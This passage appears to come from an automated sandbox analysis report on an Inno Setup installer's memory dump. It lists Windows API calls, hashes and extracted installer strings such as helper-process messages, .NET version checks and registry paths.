                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: abae256f38c62cea3cb366abebd9f15dae453fea92c2924580d2950efdc0a250
                                                                                    • Instruction ID: f244ca52905a2ca0d7e8f8dae3113ac9f84fcdd46d4f5ac2ce178984a170c16f
                                                                                    • Opcode Fuzzy Hash: abae256f38c62cea3cb366abebd9f15dae453fea92c2924580d2950efdc0a250
                                                                                    • Instruction Fuzzy Hash: 41C08CB5241A000A9E10A5FE1CC9E5E06885A0933A3240B7EF428E22D3E229E8932018
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,006B7594,00000000,006B75A3,?,?,?,?,?,006B8087), ref: 006AB83E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 6758e0e88d57d95208d96a0f93d89dc0c23ed9957f011aedbea76a8abd3591d3
                                                                                    • Instruction ID: 5844eadd80105d2e42a7600cd3cf7755a0515bcc5506321b481997a7c00cba5d
                                                                                    • Opcode Fuzzy Hash: 6758e0e88d57d95208d96a0f93d89dc0c23ed9957f011aedbea76a8abd3591d3
                                                                                    • Instruction Fuzzy Hash: 4BC0E971D125A0CEC748AB78B9056513BE6E708306B44252BE006C6565D7344441FB01
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042B8B9), ref: 0042B8AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 47be76df901b706332e82315827ab564c907f61500e99d3db6c4ca40acd98452
                                                                                    • Instruction ID: ef9e139676d678b46c4a1b97fc79adffdf8f2034590dff84815287bca9bfeada
                                                                                    • Opcode Fuzzy Hash: 47be76df901b706332e82315827ab564c907f61500e99d3db6c4ca40acd98452
                                                                                    • Instruction Fuzzy Hash: 09B09B76F0C2005DB705B6E5741155C63D8D7C47103E144A7F104C2541D57C5440465C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                    • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                                                    • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                    • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D52F4,00000000,00000000,?,0047868B,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 00478472
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: de729ddde1ab35689ebcf33e75b4741765b06252e55050244c733b99a5348007
                                                                                    • Instruction ID: ab27ebc95461ba232bf13c55df377a678303af6bdd926863771c3d858f146c26
                                                                                    • Opcode Fuzzy Hash: de729ddde1ab35689ebcf33e75b4741765b06252e55050244c733b99a5348007
                                                                                    • Instruction Fuzzy Hash: B5111C746403169BD720DF19C881B82F7E5EF88354F14C53AE9588B385E7B4E904CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
• Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness Score: -1.00%

Non-executed Functions

APIs
• GetTickCount.KERNEL32 ref: 006255E8
• QueryPerformanceCounter.KERNEL32(00000000,00000000,0062587B,?,?,00000000,00000000,?,0062627A,?,00000000,00000000), ref: 006255F1
• GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006255FB
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,0062587B,?,?,00000000,00000000,?,0062627A,?,00000000,00000000), ref: 00625604
• CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062567A
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00625688
• CreateFileW.KERNEL32(00000000,C0000000,00000000,006CC098,00000003,00000000,00000000,00000000,00625837,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006256D0
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00625826,?,00000000,C0000000,00000000,006CC098,00000003,00000000,00000000,00000000,00625837), ref: 00625709
  • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
• CreateProcessW.KERNEL32 ref: 006257B2
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006257E8
• CloseHandle.KERNEL32(000000FF,0062582D,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00625820
  • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 006A490C: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4938
  • Part of subcall function 006A490C: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4951
  • Part of subcall function 006A490C: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A497B
  • Part of subcall function 006A490C: CloseHandle.KERNEL32(00000000), ref: 006A4999
  • Part of subcall function 006A4A1C: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A4AAD,?,00000097,00000000,?,006A4B27,00000000,006A4C3F,?,?,00000001), ref: 006A4A4B
• ShellExecuteExW.SHELL32(0000003C), ref: 006A4B77
• GetLastError.KERNEL32(0000003C,00000000,006A4C3F,?,?,00000001), ref: 006A4B80
• MsgWaitForMultipleObjects.USER32 ref: 006A4BCD
• GetExitCodeProcess.KERNEL32 ref: 006A4BF3
• CloseHandle.KERNEL32(00000000,006A4C24,00000000,00000000,000000FF,000004FF,00000000,006A4C1D,?,0000003C,00000000,006A4C3F,?,?,00000001), ref: 006A4C17
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 254331816-221126205
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,0041CF88,?,?), ref: 0040E0F1
• GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
• FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF88,?,?), ref: 0040E202
• FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E214
• lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E220
• lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E265
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameW$\$kernel32.dll
• API String ID: 1930782624-3908791685
Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 006A531B
• GetWindowLongW.USER32(?,000000F0), ref: 006A5338
• GetWindowLongW.USER32(?,000000EC), ref: 006A535D
  • Part of subcall function 005ABC0C: IsWindow.USER32(?), ref: 005ABC1A
  • Part of subcall function 005ABC0C: EnableWindow.USER32(?,000000FF), ref: 005ABC29
• GetActiveWindow.USER32 ref: 006A543C
• SetActiveWindow.USER32(00000005,006A54A6,006A54BC,?,?,000000EC,?,000000F0,00000000,006A54D5,?,00000000,?,00000000), ref: 006A548F
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$ActiveLong$EnableIconic
• String ID: `
• API String ID: 4222481217-2679148245
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6,?,00000000,00000000,00000000), ref: 006B76F1
• SetFileAttributesW.KERNEL32(00000000,00000010), ref: 006B7774
• FindNextFileW.KERNEL32(000000FF,?,00000000,006B77B0,?,00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6), ref: 006B778C
• FindClose.KERNEL32(000000FF,006B77B7,006B77B0,?,00000000,?,00000000,006B77DD,?,006D479C,?,?,006B7992,00000000,006B79E6), ref: 006B77AA
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 005C7E75
• GetWindowLongW.USER32(?,000000F0), ref: 005C7E92
• GetWindowLongW.USER32(?,000000EC), ref: 005C7EB7
• GetActiveWindow.USER32 ref: 005C7EC5
• MessageBoxW.USER32(00000000,00000000,?,000000E5), ref: 005C7EF2
• SetActiveWindow.USER32(00000000,005C7F20,?,000000EC,?,000000F0,?,00000000,005C7F56,?,?,00000000), ref: 005C7F13
Memory Dump Source
• Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$IconicMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1633107849-0
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000001,00000001), ref: 005C78C5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,000000FF,00000000,00000000,00000001,00000001), ref: 005C78D5
                                                                                      • Part of subcall function 00413E90: CreateMutexW.KERNEL32(?,00000001,00000000,?,006B7A93,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000), ref: 00413EA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DescriptorSecurity$CreateDaclInitializeMutex
                                                                                    • String ID:
                                                                                    • API String ID: 3525989157-0
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000,00000000,?,006B829A,00000000,006B82A4,?,00000000), ref: 006B7A7B
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000,00000000), ref: 006B7AA1
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B7AC2
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,006B7DB9,?,?,00000000,?,00000000), ref: 006B7AD7
                                                                                      • Part of subcall function 005C5D2C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005C5DC1,?,?,?,00000001,?,0060FCDE,00000000,0060FD49), ref: 005C5D61
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: (Pm$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-2153116510
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,0062993E,?,?,?,?,00000005,00000000,00000000,?,?,0062AD40,00000000,00000000,?,00000000), ref: 006297F2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                    • API String ID: 1452528299-3112430753
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,0060E0DA,?,?,00000003,00000000,00000000,0060E11E), ref: 0060DF59
                                                                                      • Part of subcall function 005C72F8: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CAC2A,00000000,005CAC7B,?,005CAE5C), ref: 005C7317
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E018,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060DFDA
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000004,00000000,0060E018,?,?,00000000,00000000,?,00000000,?,00000000), ref: 0060E001
                                                                                    Strings
                                                                                    • RegOpenKeyEx, xrefs: 0060DED3
                                                                                    • , xrefs: 0060DECA
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060DE75
                                                                                    • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0060DEAE
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: QueryValue$FormatMessageOpen
                                                                                    • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                    • API String ID: 2812809588-1577016196
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?,?,0062733C,00000000), ref: 00626F75
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?,?,0062733C,00000000), ref: 00626FDF
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006270D1,?,00626BCC,?,00000000,00000000,00000000,?), ref: 00627046
                                                                                    Strings
                                                                                    • v4.0.30319, xrefs: 00626F67
                                                                                    • .NET Framework not found, xrefs: 00627092
                                                                                    • .NET Framework version %s not found, xrefs: 0062707E
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00626F95
                                                                                    • v1.1.4322, xrefs: 00627038
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00626F2B
                                                                                    • v2.0.50727, xrefs: 00626FD1
                                                                                    • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00626FFC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                    • API String ID: 3535843008-446240816
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 00625B77
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00625B93
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00625BA1
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 00625BB2
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625BF9
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00625C15
                                                                                    Strings
                                                                                    • Helper isn't responding; killing it., xrefs: 00625B83
                                                                                    • Helper process exited., xrefs: 00625BC1
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 00625BDF
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 00625BEB
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 00625B69
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: ece1fa278fa7807221ac24f99a083f5280eb08c08bd95b6f1cd0ee76d2da807a
                                                                                    • Instruction ID: d0bfad0dce46509abd09e9749dfb7e1faf5b73955165e0b8576abc6345a57add
                                                                                    • Instruction Fuzzy Hash: C6218070604F519EC330EB78E885B8BBBD69F48314F44CD2DB59BC7681E674E8808B66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 0060CD14: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE01
                                                                                      • Part of subcall function 0060CD14: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,0060CE51), ref: 0060CE11
                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,006B5EB6), ref: 006B5D4B
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,006B5EB6), ref: 006B5D72
                                                                                    • SetWindowLongW.USER32 ref: 006B5DAC
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000,?,00000000), ref: 006B5DE1
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006B5E55
                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000), ref: 006B5E63
                                                                                      • Part of subcall function 0060D210: WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D2F6
                                                                                    • DestroyWindow.USER32(?,006B5E86,00000000,00000000,00000000,00000000,00000000,00000097,00000000,006B5E7F,?,?,000000FC,006B53C4,00000000,?), ref: 006B5E79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 1779715363-2312673372
                                                                                    • Opcode ID: 2d446385c45222ae35a04012f96ada37b5c10dc069fd44cb051b942c343805b5
                                                                                    • Instruction ID: 631bd36c21b8289a2ffb424a70e424515061202145823e8d8c015a7ddcff5e77
                                                                                    • Instruction Fuzzy Hash: 0D418FB0A00708AFDB00EFB5D856FDE7BF9EB48710F11496AF501E7291D7749A408B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00625FD3,?,00000000,0062602E,?,?,00000000,00000000), ref: 00625E4D
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,00625F68,?,00000000,000000FF,00000000,00000000,00000000,00625FD3), ref: 00625EAA
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,00625F68,?,00000000,000000FF,00000000,00000000,00000000,00625FD3), ref: 00625EB7
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00625F03
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00625F41,00000000,00000000), ref: 00625F2D
                                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,00625F41,00000000,00000000), ref: 00625F34
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: 66b40271833c4ac947b3af9b2247b177b13a9e194abb22b80bd7f88dfb8fc291
                                                                                    • Instruction ID: 45a7b13262c8ba221a264593c31f2682aee6f87904bd064028a6768281c8f284
                                                                                    • Instruction Fuzzy Hash: C6418D71A00A08AFDB11DF99DA81EDEBBBAFB08710F1141A9F514E7391D634AA40CF24
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
